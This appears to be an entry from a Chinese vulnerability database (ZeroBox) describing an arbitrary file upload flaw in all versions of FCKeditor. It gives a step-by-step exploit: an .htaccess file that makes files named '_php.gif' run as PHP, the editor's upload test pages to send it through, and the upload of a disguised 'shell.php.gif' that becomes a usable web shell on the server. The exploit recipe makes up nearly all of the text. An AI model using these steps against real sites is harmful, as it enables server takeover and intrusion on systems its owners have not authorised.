FCKeditor所有版本任意文件上传漏洞

———————————————————
1.create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
———————————————————————————————-
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.
———————————————————

← TYPO3 Core TYPO3-CORE-SA-2011-001多个远程安全漏洞

duote.com存在注入漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

FCKeditor所有版本任意文件上传漏洞

0 条评论。

发表评论